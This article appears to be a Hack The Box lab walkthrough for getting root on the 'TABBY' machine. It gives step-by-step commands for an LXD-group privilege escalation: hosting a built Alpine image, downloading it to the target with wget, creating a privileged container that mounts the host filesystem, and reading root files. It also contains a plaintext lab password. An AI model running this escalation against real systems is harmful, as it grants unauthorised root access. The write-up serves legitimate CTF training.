TABBY Hack The Box Walkthrough for Root Flag

This is a root flag Walkthrough or Solution for the machine TABBY on Hack The Box. This machine is a Linux based machine in which we have to own root and user both. Its difficulty level is easy and has an IP 10.10.10.194 for me and it could depend on your account.

The link for the machine is https://www.hackthebox.eu/home/machines/profile/259. Please go through the steps to get the user flag before following the below-mentioned steps first. 

Steps to Get the Root Flag of the Machine

1. When we entered the id command in the ash user, we found that ash user is a member of the group lxd. So I tried privilege escalation with LXD. To do so Enter the following set of commands on your local system.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder/
sudo bash build-alpine

2. It will create a tar.gz file as shown below

creating alpine tar gz file



3. Now, Copy this tar.gz file to /var/www/html folder using the command shown below

sudo cp alpine-v3.12-x86_64-20200806_0441.tar.gz /var/www/html

Replace the alipne tar.gz file with the respective file generated on the local system.

copy alpine file

4. Run the Apache server to host the same using the following command.

sudo service apache2 restart

restart apache2 service

5. Go to the terminal with a machine shell and enter the following set of commands to change the user to ash.

su ash

This will ask for a password enter the password “admin@it” there. Now we have to write permission in the ash home directory, and we have to download the file in the same. So in order to do that switch to ash user’s home directory using the following command.

cd /home/ash

switch_to_ash_home



6. Now we are in the home directory of ash, and we could now download our alpine tar.gz file. Use the following command to download the same in the ash user home directory.

wget http://<hackthebox_ip>/alpine-v3.12-x86_64-20200806_0441.tar.gz

replace <hackthebox_ip> with your respective hackthebox ip address.

download_tar_gz_file_to_ash

7. Import the new lxc image after downloading the tar.gz file with the alias liquid and enter the following command to do the same.

lxc image import ./alpine-v3.12-x86_64-20200806_0441.tar.gz --alias liquid

Replace the alipne tar.gz file with the respective file generated on the local system.

import the lxc image

8. List the images to check the image created successfully or not and enter the following command for the same.

lxc image list

list lxc image

9. Now, all the setup is done, it’s time to initialize the lxd with the following command.

lxd init

initialize lxd



10. Enter the following command now to change the security privileged to true for liquid and privesc.

lxc init liquid privesc -c security.privileged=true

lxc init liquid privesc

11. Mount the source to root in order to get the terminal.

lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true

config lxc device

12. Enter the following command sequence in order to get the terminal from the above setup.

lxc start privesc
lxc exec privesc /bin/sh
id

getting root terminal

13. From the above snap, the id command confirms that we are now logged in as root.

14. Enter the following commands to get the hash of the root user flag.

cd /mnt/root
cd root
ls
cat root.txt

getting root flag

And there we go, we have the root flag for the user as well as root now.




My Personal Notes arrow_drop_up

Check out this Author's contributed articles.

If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to contribute@geeksforgeeks.org. See your article appearing on the GeeksforGeeks main page and help other Geeks.

Please Improve this article if you find anything incorrect by clicking on the "Improve Article" button below.


Article Tags :

Be the First to upvote.


Please write to us at contribute@geeksforgeeks.org to report any issue with the above content.